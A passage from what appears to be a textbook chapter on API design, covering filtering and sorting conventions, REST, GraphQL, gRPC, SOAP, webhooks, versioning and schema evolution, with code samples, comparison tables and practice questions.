(score DESC, id DESC).- Interview: A client needs "jump to page 500" on a billion-row table. What do you propose? (Hint: question the requirement first, then consider what an approximate answer would cost versus an exact one.)
Filtering and Sorting Conventions
Once a collection endpoint exists, clients immediately want a subset of it,
ordered their way. If you do not define a convention, you will end up with
/orders/pending, /orders/recent, and /orders/by-customer — the endpoint
explosion resource modelling was meant to prevent. Filtering and sorting belong
in the query string, because they describe which representation of the
collection you want, not a different resource.
The design tension is between expressiveness and safety. A rich filter language is convenient for clients and dangerous for you: unbounded query flexibility means unbounded query cost, and a filter on an unindexed column is a full table scan triggered by a stranger.
### A conventional, boring, predictable collection query
GET /orders?status=pending&created_after=2026-01-01&sort=-created_at&limit=20
# status=pending exact match filter
# created_after=... range filter, explicit and readable
# sort=-created_at leading '-' means descending; comma-separate for
# multiple keys: sort=-created_at,id
# limit=20 page size, capped server-side
### Multiple values: repeat the key or comma-separate — pick ONE and document it
GET /orders?status=pending&status=paid
GET /orders?status=pending,paid
# Allowlist everything. This is the difference between a filter API and an
# accidental SQL injection surface with a performance bug attached.
FILTERABLE = { # column -> (sql_op, parser)
"status": ("=", str),
"customer_id": ("=", int),
"created_after": (">=", parse_date),
"created_before": ("<", parse_date),
"total_min": (">=", Decimal),
}
SORTABLE = {"created_at", "total", "id"} # all indexed; nothing else allowed
MAX_LIMIT = 100
def build_query(params):
clauses, args = [], []
for key, raw in params.items():
if key in ("sort", "limit", "cursor"):
continue
if key not in FILTERABLE:
raise ApiError(400, "unknown_filter", f"Unknown filter '{key}'")
op, parse = FILTERABLE[key]
clauses.append(f"{key.replace('_after','').replace('_before','')} {op} %s")
args.append(parse(raw)) # parsed, then bound — never interpolated
sort = params.get("sort", "-created_at")
order = []
for term in sort.split(","):
desc = term.startswith("-")
col = term.lstrip("-")
if col not in SORTABLE: # unindexed sort = table scan
raise ApiError(400, "unsortable_field", f"Cannot sort by '{col}'")
order.append(f"{col} {'DESC' if desc else 'ASC'}")
order.append("id DESC") # tiebreaker: makes paging deterministic
limit = min(int(params.get("limit", 20)), MAX_LIMIT)
return clauses, order, limit, args
| Concern | Convention |
|---|---|
| Exact match | ?status=paid |
| Multiple values | ?status=paid&status=pending (documented consistently) |
| Ranges | ?created_after=, ?total_min= (explicit suffixes) |
| Sorting | ?sort=-created_at,id (- prefix = descending) |
| Sparse fields | ?fields=id,total,status (reduces payload size) |
| Free-text search | ?q=... — a different mechanism; often a search index |
| Unknown parameter | Fail with 400, do not ignore silently |
That last row matters more than it seems. Silently ignoring an unrecognized
filter means a client typo (?statuss=paid) returns every order and the bug
surfaces as a data leak or a runaway query rather than an error.
Always add a deterministic tiebreaker to the sort. Without it, rows with equal sort values come back in arbitrary order and pagination silently skips or duplicates them.
Key Takeaways
- Filtering and sorting go in the query string, not in new endpoints.
- Allowlist filterable and sortable fields; every sortable field must be indexed.
- Reject unknown parameters instead of ignoring them.
- Always append a unique tiebreaker to the sort so pagination is deterministic.
🧪 Practice
- Design the query parameters for a product search with category, price range, in-stock flag, and sorting by price or rating.
- Explain what goes wrong when sorting by a non-unique column without a tiebreaker while paginating.
- Interview: A client wants arbitrary boolean filter expressions (
(a AND b) OR c). How do you respond? (Hint: think about what you can guarantee about query cost, and what a purpose-built search layer offers that a database table does not.)
<a id="32-api-styles"></a>
3.2 API Styles
The same domain can be exposed through several interface styles, each optimizing for a different consumer and a different set of constraints.
REST
REST is the default style for public and general-purpose APIs, and its popularity comes from a simple bargain: instead of inventing a protocol, use the one the web already has. HTTP supplies methods, status codes, caching, content negotiation, and authentication, and every proxy, CDN, browser, and client library in existence already understands them.
REST — Representational State Transfer — describes an architectural style with a few constraints: a client-server split, statelessness, cacheability, a uniform interface, and layering. In practice "RESTful" usually means resource-oriented HTTP with sensible methods and status codes, which is what the previous subchapter described.
The constraint that gives the most value and is most often skipped is
cacheability. Because a GET is safe and addressable by URL, any layer in
the path can cache it, and that is why a well-designed REST API gets a CDN for
free while an RPC-over-POST API does not.
### Cache-friendliness is a design decision, not an accident
GET /products/42
Accept: application/json
HTTP/1.1 200 OK
Cache-Control: public, max-age=60, stale-while-revalidate=300
ETag: "v7-9f2c"
Content-Type: application/json
{"id": 42, "name": "Desk lamp", "price": "39.00", "currency": "EUR"}
### A conditional request costs almost nothing when unchanged
GET /products/42
If-None-Match: "v7-9f2c"
HTTP/1.1 304 Not Modified
# No body transferred. The same ETag also powers optimistic concurrency:
# PUT /products/42 with If-Match: "v7-9f2c" fails with 412 if someone else
# changed it first — lost-update prevention for free.
# REST's weakness: the response shape is fixed by the server, so clients
# either over-fetch or make several calls.
# Over-fetching: the mobile list view needs 3 fields, gets 40.
GET /users/7 # -> full profile: bio, preferences, addresses, ...
# Under-fetching (the N+1 problem): rendering one screen takes many round trips.
GET /orders/42 # -> {"customer_id": 7, "item_ids": [1, 2, 3]}
GET /users/7 # -> customer details
GET /items/1 # -> item 1
GET /items/2 # -> item 2
GET /items/3 # -> item 3
# 5 sequential round trips. At 60 ms each, that is 300 ms of pure latency.
#
# Standard mitigations, in order of preference:
# ?fields=id,name,price sparse fieldsets, fixes over-fetching
# ?expand=customer,items server-side expansion, fixes under-fetching
# a purpose-built endpoint e.g. GET /orders/42/summary for one screen
Richardson's maturity model is a useful vocabulary for how far an API commits to the style:
| Level | Description | Typical reality |
|---|---|---|
| 0 | One endpoint, everything is POST | RPC wearing an HTTP costume |
| 1 | Resources have distinct URLs | A common starting point |
| 2 | Proper methods and status codes | What most people mean by REST |
| 3 | Hypermedia links drive navigation (HATEOAS) | Rare outside specific domains |
Level 2 is where the practical value sits. Level 3 (responses embedding links to available next actions) delivers real decoupling for long-lived, independently evolving clients, but most teams find the added complexity is not repaid.
Key Takeaways
- REST reuses HTTP's methods, status codes, and caching instead of inventing a protocol.
- Cacheable
GETs are the biggest practical win: CDNs and proxies work without extra effort.ETagpowers both cheap revalidation (304) and optimistic concurrency (If-Match,412).- Its weakness is fixed response shapes: over-fetching and N+1 round trips.
🧪 Practice
- Design REST endpoints and cache headers for a product catalogue where prices change hourly and descriptions change rarely.
- Show how
ETagplusIf-Matchprevents two editors overwriting each other, including the status code on conflict.- Interview: A mobile team says your REST API is too chatty. Give three solutions and their trade-offs. (Hint: one changes the response, one adds an endpoint, one changes the style entirely.)
GraphQL
REST's fixed response shapes create a structural tension: the server decides what a resource looks like, but the client knows what it needs. Every new screen either over-fetches, makes extra round trips, or demands a new endpoint — and the endpoint count grows with the UI. GraphQL resolves that tension by letting the client specify the shape of the response.
A GraphQL API exposes a single endpoint and a strongly typed schema describing every field and relationship. The client sends a query naming exactly the fields it wants, including nested relationships, and receives exactly that structure in one round trip.
The analogy: REST is a set menu — the kitchen decides what comes on the plate. GraphQL is à la carte, where the diner composes the plate from a published menu.
# The schema is the contract: typed, introspectable, and self-documenting.
type Query {
order(id: ID!): Order
}
type Order {
id: ID!
total: Money!
status: OrderStatus!
customer: User! # a relationship the client may or may not traverse
items: [OrderItem!]!
}
type User { id: ID!, name: String!, email: String! }
type OrderItem { id: ID!, quantity: Int!, product: Product! }
# One request replaces the five REST round trips from the previous topic.
query OrderScreen {
order(id: "42") {
total
status
customer { name } # only the field the screen renders
items {
quantity
product { name, price } # nested traversal, still one round trip
}
}
}
// The response mirrors the query exactly — no guessing, no unused fields.
{
"data": {
"order": {
"total": "58.00",
"status": "PAID",
"customer": { "name": "Ada" },
"items": [{ "quantity": 2, "product": { "name": "Lamp", "price": "29.00" } }]
}
}
// Note: errors arrive in a top-level "errors" array, usually with HTTP 200.
// That is the single biggest operational surprise when adopting GraphQL.
}
What you gain is real; what you give up is often underestimated.
| Aspect | Benefit | Cost |
|---|---|---|
| Response shape | Client-specified; no over-fetching | Query cost is unpredictable for the server |
| Round trips | One request for a whole screen | Resolver fan-out can cause N+1 database queries |
| Schema | Typed, introspectable, self-documenting | Schema becomes a coordination point across teams |
| Endpoints | One | HTTP caching, status codes, and CDNs largely stop applying |
| Versioning | Additive evolution, deprecate fields | Old fields linger; nothing forces cleanup |
| Monitoring | Per-field usage analytics | "Slow endpoint" dashboards are meaningless — every query differs |
# The N+1 trap is GraphQL's signature failure mode. A query asking for 100
# orders and each order's customer naively triggers 1 + 100 database queries.
#
# The fix is batching within a single request tick (the DataLoader pattern):
async def batch_load_users(user_ids):
rows = await db.query("SELECT * FROM users WHERE id = ANY(%s)", (user_ids,))
by_id = {r.id: r for r in rows}
return [by_id.get(uid) for uid in user_ids] # order must match input
user_loader = DataLoader(batch_load_users)
# Each resolver calls user_loader.load(id); the loader collects all ids raised
# during one tick and issues ONE query. 101 queries become 2.
Production GraphQL also needs guards a REST API gets for free: query depth limits and complexity scoring (a single deeply nested query can be a denial-of-service vector), and persisted queries (clients register queries by hash, restoring cacheability and preventing arbitrary queries from strangers).
Key Takeaways
- GraphQL lets clients specify the response shape, eliminating over-fetching and multi-round-trip screens.
- The schema is a typed, introspectable contract, and evolution is additive with field deprecation.
- You lose HTTP caching, meaningful status codes, and predictable server-side query cost.
- Production GraphQL requires DataLoader batching, depth/complexity limits, and persisted queries.
🧪 Practice
- Write a GraphQL query fetching a user's last 5 orders with item names and total, and count the REST calls it replaces.
- Explain how a malicious client could build an expensive query from a friendly-looking schema, and name two defences.
- Interview: How do you cache a GraphQL API? (Hint: the unit that made REST cacheable was the URL — ask what plays that role here, and what has to happen at the field level instead.)
gRPC and Protocol Buffers
Internal service-to-service traffic has different priorities from public APIs. Nobody is exploring it in a browser, the clients are your own services, calls happen millions of times a day, and every millisecond and byte is multiplied across the fleet. In that setting, JSON over HTTP/1.1 is wasteful: text parsing burns CPU, field names are repeated in every message, and there is no enforced schema.
gRPC targets exactly this. You define services and messages in a .proto
file, generate strongly typed client and server code in a dozen languages, and
the calls travel as compact binary frames over HTTP/2 — which brings
multiplexing over one long-lived connection and header compression (Chapter 2).
Protocol Buffers is the serialization format. Instead of transmitting field names, it transmits small integer field numbers, which is why the encoding is compact and why field numbers are permanent once assigned.
syntax = "proto3";
package orders.v1;
service OrderService {
rpc GetOrder (GetOrderRequest) returns (Order); // unary
rpc ListOrders (ListOrdersRequest) returns (stream Order); // server stream
rpc RecordEvents(stream OrderEvent) returns (RecordSummary); // client stream
rpc Watch (stream WatchRequest) returns (stream OrderUpdate); // bidirectional
}
message Order {
string id = 1; // the NUMBER is the wire identity, not the name.
string status = 2; // Renaming a field is safe; reusing a number is not.
int64 total_cents = 3;
reserved 4; // 4 was deleted; reserving stops accidental reuse
repeated OrderItem items = 5;
}
# Generated code turns a network call into an ordinary typed method call.
import grpc
from orders.v1 import orders_pb2, orders_pb2_grpc
channel = grpc.insecure_channel("orders:50051") # one long-lived HTTP/2 connection
stub = orders_pb2_grpc.OrderServiceStub(channel)
# Unary call with a deadline — gRPC propagates deadlines across hops, so a
# downstream service knows how much time is left rather than working on a
# request whose caller already gave up.
try:
order = stub.GetOrder(orders_pb2.GetOrderRequest(id="42"), timeout=0.250)
print(order.status) # typed field, no dict lookup
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.DEADLINE_EXCEEDED:
... # typed status codes, not 500s
# Server streaming: results arrive incrementally over the same connection.
for order in stub.ListOrders(orders_pb2.ListOrdersRequest(customer_id="7")):
process(order) # no pagination machinery needed
PAYLOAD COMPARISON (same order record)
JSON {"id":"42","status":"PAID","total_cents":5800} 46 bytes
Protobuf 0a 02 34 32 12 04 50 41 49 44 18 a8 2d 13 bytes
~3-4x smaller on the wire, and parsing is a byte-level decode instead of
string scanning. Multiplied across millions of internal calls per day, this
is real CPU and real bandwidth.
| Dimension | gRPC | REST/JSON |
|---|---|---|
| Payload | Binary, compact | Text, human-readable |
| Schema | Required, code-generated | Optional (OpenAPI) |
| Transport | HTTP/2 only | Any HTTP version |
| Streaming | First-class, all four modes | SSE/WebSockets bolted on |
| Browser support | Needs a proxy (gRPC-Web) | Native |
| Debuggability | Needs tooling (grpcurl) | curl and a browser |
| Best for | Internal service-to-service | Public and browser-facing APIs |
The compatibility rules are strict and worth memorizing: never change a field
number, never change a field's type, and reserved any number you delete.
Adding new optional fields is always safe, which is what makes proto schemas
evolvable.
Key Takeaways
- gRPC is built for internal, high-volume service-to-service calls: binary payloads over multiplexed HTTP/2.
- Protobuf identifies fields by number, so numbers are permanent and deleted ones must be reserved.
- Code generation gives typed clients, typed status codes, and deadline propagation across hops.
- Browsers cannot speak gRPC directly, and debugging requires dedicated tooling.
🧪 Practice
- Write a
.protoservice for a user profile API with one unary and one server-streaming method.- Explain exactly what breaks if a team renames field 3 versus reusing number 3 for a different field.
- Interview: Why does gRPC deadline propagation matter more than a simple per-call timeout? (Hint: think about a chain of five services and what each is doing after the user has already seen an error.)
SOAP and Legacy RPC
You will meet SOAP. It runs payroll, banking, insurance, healthcare, telecom provisioning, and government integrations, and those systems are not going anywhere. Understanding why it looks the way it does turns "legacy nonsense" into a set of deliberate — if heavyweight — engineering decisions.
SOAP (Simple Object Access Protocol) is an XML messaging protocol from an era
when the priority was enterprise interoperability with formal guarantees
across mutually distrustful organizations. It brings a machine-readable contract
(WSDL), and a family of WS-* standards for security, transactions, and
reliable messaging — features REST leaves to the transport or the application.
Older still is plain RPC (CORBA, XML-RPC, Java RMI): call a remote function as if it were local. The idea is seductive and the flaw is famous — hiding the network makes developers forget it can be slow, partition, or fail entirely.
<!-- A SOAP request: the envelope carries headers (security, transactions)
alongside the body (the actual call). -->
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<wsse:Security> <!-- message-level, not transport-level -->
<wsse:UsernameToken>
<wsse:Username>svc_billing</wsse:Username>
<wsse:Password Type="...#PasswordDigest">QZk...</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</soap:Header>
<soap:Body>
<GetOrderRequest xmlns="http://example.com/orders">
<OrderId>42</OrderId>
</GetOrderRequest>
</soap:Body>
</soap:Envelope>
<!-- Errors are Faults inside a 500 response, not HTTP status codes. -->
<soap:Fault>
<soap:Code><soap:Value>soap:Sender</soap:Value></soap:Code>
<soap:Reason><soap:Text>Order 42 not found</soap:Text></soap:Reason>
</soap:Fault>
The crucial difference from REST is that security and reliability live in the message, not the transport. A WS-Security signature survives being forwarded through a queue, stored, and audited later; TLS protects only the hop it is on. For a payment instruction passing through four organizations, that distinction is the entire point.
| Aspect | SOAP | REST |
|---|---|---|
| Format | XML only | Usually JSON |
| Contract | WSDL (mandatory, machine-readable) | OpenAPI (optional) |
| Transport | HTTP, SMTP, JMS, MQ | HTTP |
| Errors | SOAP Faults | HTTP status codes |
| Security | WS-Security (message-level) | TLS + OAuth (transport-level) |
| Transactions | WS-AtomicTransaction | Sagas, application-level |
| Payload size | Large (verbose XML) | Compact |
| Where you find it | Finance, healthcare, government, telecom | Everywhere else |
# Integrating with SOAP in a modern stack: wrap it, do not spread it.
from zeep import Client # generates a client from the WSDL
class LegacyBillingGateway:
"""Anti-corruption layer: SOAP stays behind this boundary."""
def __init__(self, wsdl_url):
self._client = Client(wsdl_url) # WSDL describes types and operations
def get_invoice(self, invoice_id: str) -> Invoice:
try:
raw = self._client.service.GetInvoice(InvoiceId=invoice_id)
except Fault as f: # SOAP Fault, not an HTTP status
raise InvoiceNotFound(invoice_id) from f
return Invoice( # translate into YOUR domain model
id=raw.InvoiceId,
total=Decimal(raw.TotalAmount),
issued_at=raw.IssuedDate,
)
# The rest of the codebase never imports zeep and never sees XML. When the
# legacy system is eventually replaced, one class changes.
Key Takeaways
- SOAP is XML messaging with a mandatory WSDL contract and
WS-*standards for security and transactions.- Its distinguishing feature is message-level (not transport-level) security and reliability, which survives forwarding and storage.
- Errors are SOAP Faults, not HTTP status codes; the transport need not even be HTTP.
- Isolate legacy integrations behind an anti-corruption layer that translates into your own domain model.
🧪 Practice
- List three capabilities SOAP provides out of the box that a REST API must build itself.
- Explain why message-level signing matters when a request passes through three intermediaries.
- Interview: You must integrate a 15-year-old SOAP billing system into a new microservice platform. Describe your approach. (Hint: think about where the translation lives and what you would want to be true on the day the legacy system is finally switched off.)
Webhooks
Every API discussed so far requires the client to ask. But some events originate on the server's side — a payment settles, a video finishes encoding, a shipment is scanned — and the client has no way to know when. The naive answer is polling: ask every 30 seconds, waste 99% of the requests, and still learn about it up to 30 seconds late.
Webhooks invert the direction. The consumer registers a URL, and the
provider sends an HTTP POST to it whenever a relevant event occurs. It is a
"reverse API" — your API calls their API — and it turns a polling loop into a
push notification.
POLLING WEBHOOK
You --> them "anything?" no Them --> you POST /hooks/payments
You --> them "anything?" no {"type":"payment.succeeded"}
You --> them "anything?" YES
Zero wasted requests.
2,880 requests/day per resource Latency: near zero.
Latency: up to the poll interval Cost: you must run a public endpoint
that is always available.
Receiving webhooks correctly is where most integrations go wrong, because the sender is an untrusted party on the public internet and delivery guarantees are weak. Four things are non-negotiable.
import hmac, hashlib, time
MAX_SKEW_SECONDS = 300
def receive_webhook(request, secret, db, queue):
# 1. VERIFY THE SIGNATURE. Anyone can POST to a public URL; the signature
# is the only proof the payload came from the provider.
ts = request.headers["X-Timestamp"]
sig = request.headers["X-Signature"]
expected = hmac.new(secret.encode(),
f"{ts}.".encode() + request.raw_body, # sign raw bytes
hashlib.sha256).hexdigest()
if not hmac.compare_digest(expected, sig): # constant-time: avoids timing attacks
return response(401)
# 2. REJECT REPLAYS. A signature stays valid forever unless it is time-bound.
if abs(time.time() - int(ts)) > MAX_SKEW_SECONDS:
return response(401)
event = json.loads(request.raw_body)
# 3. DEDUPLICATE. Delivery is at-least-once: retries mean the same event
# arrives more than once, and events can arrive OUT OF ORDER.
if not db.try_insert_event(event["id"]): # unique constraint on event id
return response(200, {"status": "duplicate_ignored"})
# 4. ACKNOWLEDGE FAST, PROCESS LATER. Providers time out in seconds and
# disable endpoints that are slow or failing.
queue.publish("webhook.received", event)
return response(200) # ack within milliseconds
The provider side has its own obligations:
| Provider responsibility | Why |
|---|---|
| Sign every payload | The consumer cannot otherwise trust the sender |
| Include a unique event id and timestamp | Enables deduplication and replay rejection |
| Retry with exponential backoff | Consumers have outages too |
| Cap retries, then dead-letter | Do not retry forever into a black hole |
| Provide a replay/history API | Lets consumers recover from a lost window |
| Document ordering guarantees | Almost always "none" — say so explicitly |
Because webhooks require a publicly reachable, always-available endpoint, many providers now offer a pull alternative (an events endpoint the consumer polls with a cursor) for consumers who cannot host one. Offering both is increasingly the norm.
Key Takeaways
- Webhooks invert the direction: the provider POSTs to a consumer-registered URL when an event occurs.
- Always verify an HMAC signature over the raw body and reject stale timestamps.
- Delivery is at-least-once and unordered — deduplicate by event id and never assume sequence.
- Acknowledge immediately and process asynchronously; providers disable slow endpoints.
🧪 Practice
- Implement signature verification and explain why signing the parsed JSON instead of the raw body is a vulnerability.
- Design a retry schedule with backoff and a dead-letter policy for failed deliveries.
- Interview: A webhook consumer was down for 6 hours. How do they recover without losing events? (Hint: consider what the provider must have kept, and what the consumer must be able to ask for.)
Choosing Between API Styles
Style debates are usually arguments about defaults dressed up as arguments about technology. The productive question is never "which is best?" but "who is the consumer, what do they need, and what constraints do they operate under?" — and the answer routinely differs for different parts of one system.
Three questions settle most cases:
- Who calls it? A browser, a third-party developer, a mobile app, or another one of your services.
- What is the interaction shape? Fetching data, invoking an operation, streaming, or reacting to events.
- What constrains you? Public reach and debuggability, per-request cost at volume, or an existing enterprise contract.
DECISION SKETCH
Is the caller a browser or a third-party developer?
|-- yes: is the client's data need highly variable per screen?
| |-- yes -> GraphQL (add persisted queries + complexity limits)
| `-- no -> REST (cacheable, debuggable, universally understood)
`-- no (internal service-to-service):
|-- high volume / low latency / streaming -> gRPC
`-- low volume, simple -> REST is fine
Does the OTHER side need to notify YOU? -> Webhooks (or an event stream)
Is there an existing enterprise contract? -> SOAP, behind an adapter
| Criterion | REST | GraphQL | gRPC | Webhooks | SOAP |
|---|---|---|---|---|---|
| Public/third-party API | Excellent | Good | Poor | Complement | Legacy |
| Browser support | Native | Native | Needs proxy | n/a | Awkward |
| Internal high-volume | Adequate | Adequate | Excellent | n/a | Poor |
| HTTP caching | Excellent | Poor | None | n/a | None |
| Payload efficiency | Medium | Medium | High | Medium | Low |
| Streaming | SSE only | Subscriptions | Native | n/a | No |
Debuggability (curl) | Excellent | Good | Poor | Good | Poor |
| Schema enforcement | Optional | Built in | Built in | Provider-defined | Built in |
| Learning curve | Low | Medium | Medium | Low | High |
A realistic large system uses several at once, and that is not inconsistency — it is matching the tool to the consumer:
A TYPICAL COMPOSITE ARCHITECTURE
[Browser / mobile] --GraphQL or REST--> [API gateway / BFF]
|
gRPC | gRPC
+------------------+------------------+
v v v
[Orders svc] [Inventory svc] [Pricing svc]
|
webhooks | (outbound to partners)
v
[Partner endpoints]
Public edge: REST/GraphQL — debuggable, cacheable, browser-friendly.
Internal: gRPC — fast, typed, streaming.
Partners: webhooks — they do not want to poll you.
Two closing cautions. Do not adopt GraphQL to fix a data-modelling problem — a badly modelled domain is just as badly modelled behind a schema. And do not use gRPC for a public API unless every consumer is technical and tooled for it; the debuggability cost lands on your support team.
Key Takeaways
- Choose by consumer and interaction shape, not by preference; one system legitimately uses several styles.
- REST for public and cacheable; GraphQL for variable client data needs; gRPC for internal high-volume and streaming.
- Webhooks complement any style — they solve provider-to-consumer notification, not data access.
- Style never fixes a modelling problem, and public APIs pay for undebuggable protocols in support cost.
🧪 Practice
- Pick a style for each and justify: a public payments API, an internal fraud-scoring service called 50,000 times/second, a mobile app dashboard, notifying merchants of refunds.
- Design the composite architecture for an e-commerce platform, naming the style at each boundary.
- Interview: When is adopting GraphQL the wrong answer to "our API is too chatty"? (Hint: consider what else could be causing chattiness and what new operational burden GraphQL adds.)
<a id="33-api-lifecycle-management"></a>
3.3 API Lifecycle Management
An API is a promise to people you cannot deploy alongside; this subchapter is about keeping that promise while still being able to change the system.
API Versioning Strategies
Once someone else's code depends on your API, you have lost the ability to change it freely. But requirements keep moving, so you need a way to introduce change without breaking the clients you cannot upgrade — and versioning is that mechanism.
The first thing to internalize is that versioning is a last resort, not a routine step. Every live version is code you maintain, test, monitor, and debug. Two supported versions roughly double that surface; five make it unmanageable. The best change is one that needs no new version at all, which is what the next two topics are about.
When a breaking change is genuinely unavoidable, four placements are available.
### 1. URI path — most common, most visible, easiest to route and cache
GET /v2/orders/42
### 2. Query parameter — easy to add, easy to forget, messy to cache
GET /orders/42?version=2
### 3. Custom header — keeps URLs clean, invisible in a browser address bar
GET /orders/42
X-API-Version: 2
### 4. Content negotiation — the most "correct" by HTTP semantics, least used
GET /orders/42
Accept: application/vnd.example.order.v2+json
| Strategy | Visible in logs/browser | Cache-friendly | Routing effort | Common in practice |
|---|---|---|---|---|
URI path (/v2/) | Yes | Yes | Trivial | Very common |
| Query parameter | Yes | Poor (varies by param) | Easy | Uncommon |
| Custom header | Only in logs | Needs Vary | Easy | Common internally |
Accept media type | Only in logs | Needs Vary | Moderate | Rare |
URI path versioning wins on pragmatics: a developer can paste the URL into a
browser, a CDN can cache each version separately, a gateway can route /v1/ and
/v2/ to different deployments, and support conversations are unambiguous.
The second decision is granularity. Versioning the whole API means one breaking change forces every client onto a new version of everything. Versioning per resource limits the blast radius but multiplies bookkeeping.
# A practical middle ground: one global major version, with additive changes
# handled by feature negotiation rather than by a version bump.
@route("GET", "/v1/orders/{id}")
def get_order(request, order_id):
order = repo.get(order_id)
body = {
"id": order.id,
"status": order.status,
"total": str(order.total),
}
# New fields are additive and therefore NOT a breaking change; they can
# ship inside v1 without asking anyone to migrate.
body["currency"] = order.currency
# Behaviour changes that WOULD break someone go behind an explicit opt-in,
# so existing clients keep the old semantics until they choose otherwise.
if "itemized-totals" in request.headers.get("X-API-Features", ""):
body["totals"] = {"net": str(order.net), "tax": str(order.tax)}
return body
Two rules keep versioning sane. Never version for additive changes — new optional fields and new endpoints break nobody. And never let a version live forever without a stated end date; a version with no sunset is a permanent maintenance obligation you agreed to by accident.
Key Takeaways
- Versioning is a last resort; the cheapest change is one requiring no new version.
- URI path versioning is the pragmatic default: visible, cacheable, trivially routable.
- Version granularity trades blast radius against bookkeeping — a single major version plus additive change works for most APIs.
- Every version needs a stated sunset date from the day it ships.
🧪 Practice
- Classify as breaking or non-breaking: adding an optional response field, renaming a field, making an optional request field required, adding a new enum value, tightening a validation rule.
- Design the routing and deployment layout for running
/v1and/v2side by side with shared business logic.- Interview: A client depends on a field you must remove for legal reasons. Walk through your plan. (Hint: separate "stop returning it" from "stop supporting the version", and think about who you must talk to first.)
Backward and Forward Compatibility
Versioning is expensive, so the real skill is avoiding the need for it. That means understanding precisely which changes break clients and which do not — and the answer is not symmetric, because there are two different directions of compatibility.
Backward compatibility: new server code works with old clients. This is the one everyone thinks of, and it is what lets you deploy without coordinating with consumers.
Forward compatibility: old code works with data produced by newer versions. This is the one people forget, and it depends mostly on how clients are written — specifically, whether they tolerate fields they do not recognize.
WHY BOTH MATTER DURING A ROLLING DEPLOY
t=0 all instances v1 clients v1
t=1 half v1, half v2 <-- BOTH versions serve traffic simultaneously
t=2 all instances v2 clients still v1 for weeks
Backward compatibility keeps old clients working against v2 servers.
Forward compatibility keeps v1 servers (and old clients) working when they
receive v2-shaped data — from a peer instance, a queue, or a cache.
A rolling deploy REQUIRES both, even if no client ever changes.
The rule that makes forward compatibility possible is tolerant reading (Postel's law applied to APIs): ignore unknown fields rather than rejecting them. A client that validates strictly against a closed schema breaks the moment the server adds a field — which means the server can never add a field.
// Fragile: strict validation makes every additive server change a breakage.
function parseOrderStrict(json) {
const allowed = ["id", "status", "total"];
for (const key of Object.keys(json)) {
if (!allowed.includes(key)) {
throw new Error(`Unexpected field: ${key}`); // server adds "currency" -> boom
}
}
return json;
}
// Tolerant: read what you need, ignore the rest, default what is missing.
function parseOrder(json) {
return {
id: json.id,
status: json.status,
total: json.total,
currency: json.currency ?? "EUR", // tolerate absence: works against old servers
// and against new ones
};
// Unknown fields are simply not read. The server is now free to add fields.
}
| Change | Backward compatible? | Notes |
|---|---|---|
| Add an optional response field | Yes | Requires tolerant clients |
| Add an optional request field | Yes | Must have a sensible default |
| Add a new endpoint | Yes | Nobody is calling it yet |
| Add a new enum value | No, usually | Old clients may not handle it — plan an "unknown" branch |
| Remove or rename a field | No | Deprecate first, remove later |
| Make an optional field required | No | Existing requests start failing |
Narrow a type (string -> int) | No | Parsing breaks |
Widen a type (int -> string) | No | Also breaks: clients parse the old type |
| Tighten validation | No | Previously accepted requests now fail |
| Loosen validation | Yes | Nothing previously valid becomes invalid |
| Change an error status code | No | Clients branch on status |
| Change default sort order or paging | No | Silent behaviour change — the worst kind |
Two entries deserve emphasis. New enum values are a breaking change in
disguise: an old client with a switch over three statuses will hit its
default branch — or crash — when a fourth appears. Document from v1 that
clients must handle unknown enum values gracefully. And silent behaviour
changes (a different default page size, a changed sort order, a newly applied
filter) are worse than outright errors, because they corrupt results without
anyone noticing.
Key Takeaways
- Backward compatibility: new servers serve old clients. Forward compatibility: old code tolerates new data.
- Rolling deploys require both, even when no client changes.
- Tolerant reading — ignore unknown fields, default missing ones — is what makes additive change possible.
- New enum values and silent behaviour changes are breaking changes that look harmless.
🧪 Practice
- Take an API response you know and list five additive changes and three breaking ones.
- Write a tolerant client parser that handles an unknown enum value without crashing, and say what it should do with the record.
- Interview: Why is widening a field's type also a breaking change? (Hint: think about the client's deserializer, not the server's serializer.)
Schema Evolution
Compatibility rules are easy to state and hard to enforce by discipline alone. Schema evolution is the practice of making those rules mechanical — encoding the contract in a schema file that tooling can check, so an incompatible change fails a build rather than a customer's integration.
This matters most where the producer and consumer are deployed independently and data outlives the code that wrote it: message queues, event streams, and stored records. A JSON blob written today may be read in two years by code that does not exist yet.
Each serialization format handles evolution differently, and the differences are practical rather than academic.
| Format | Schema | Evolution mechanism | Reader needs writer's schema? |
|---|---|---|---|
| JSON | Optional (JSON Schema) | Convention and discipline | No |
| Protobuf | Required | Field numbers; unknown fields preserved | No |
| Avro | Required | Reader and writer schemas resolved at read time | Yes |
| Thrift | Required | Field ids, like Protobuf | No |
// Protobuf's evolution rules, made explicit.
message Order {
string id = 1;
string status = 2;
int64 total_cents = 3;
reserved 4; // was `legacy_discount`; number retired forever
reserved "legacy_discount"; // and the NAME is retired too, so nobody revives it
string currency = 5; // ADDING a new optional field: always safe
repeated string tags = 6; // repeated fields default to empty, never null
}
// SAFE: add a field with a fresh number; rename a field (name is cosmetic)
// UNSAFE: change a number; change a type; reuse a retired number
// Old readers keep the unknown fields intact when re-serializing, which means a
// v1 service can round-trip a v2 message without destroying data.
{
"$schema": "https://json-schema.org/draft/2020-12/schema",
"title": "Order",
"type": "object",
"required": ["id", "status", "total"],
"properties": {
"id": {"type": "string"},
"status": {"type": "string", "enum": ["pending", "paid", "cancelled"]},
"total": {"type": "string", "pattern": "^[0-9]+\\.[0-9]{2}$"}
},
"additionalProperties": true
}
That last line is the whole game for JSON. additionalProperties: true makes
consumers tolerant, so the producer can add fields. Setting it to false locks
the schema and turns every future addition into a breaking change.
# Make compatibility a build-time check, not a code-review hope.
# Run in CI on every pull request that touches a schema:
#
# buf breaking --against '.git#branch=main' # protobuf
# sq compatibility check --level BACKWARD # schema registry
#
def check_backward_compatible(old_schema, new_schema):
errors = []
for name, field in old_schema.fields.items():
new = new_schema.fields.get(name)
if new is None:
errors.append(f"{name}: removed (breaks existing readers)")
elif new.type != field.type:
errors.append(f"{name}: type {field.type} -> {new.type}")
elif new.required and not field.required:
errors.append(f"{name}: became required")
for name, field in new_schema.fields.items():
if name not in old_schema.fields and field.required:
errors.append(f"{name}: new required field breaks old writers")
return errors # non-empty -> fail the build
A schema registry operationalizes this for event streams: producers register
schemas, the registry rejects incompatible versions, and consumers fetch the
schema they need by id. Compatibility modes are configurable — BACKWARD (new
consumers read old data), FORWARD (old consumers read new data), or FULL
